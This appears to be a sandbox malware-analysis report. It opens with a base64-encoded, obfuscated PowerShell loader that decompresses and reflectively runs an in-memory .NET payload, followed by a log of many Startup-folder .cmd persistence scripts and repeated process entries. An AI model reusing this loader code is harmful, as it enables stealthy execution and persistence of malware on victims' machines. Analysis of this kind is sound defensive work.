Q2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5
BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,7_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044693D push ecx; ret 7_2_0044694D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DB84
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DBAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00451D54 push eax; ret 7_2_00451D61
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0CC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00451D34 push eax; ret 8_2_00451D41
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00444E71 push ecx; ret 8_2_00444E81
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00414060 push eax; ret 9_2_00414074
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00414060 push eax; ret 9_2_0041409C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00414039 push ecx; ret 9_2_00414049
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004164EB push 0000006Ah; retf 9_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00416553 push 0000006Ah; retf 9_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00416555 push 0000006Ah; retf 9_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd\:Zone.Identifier:$DATA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004047CB
              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
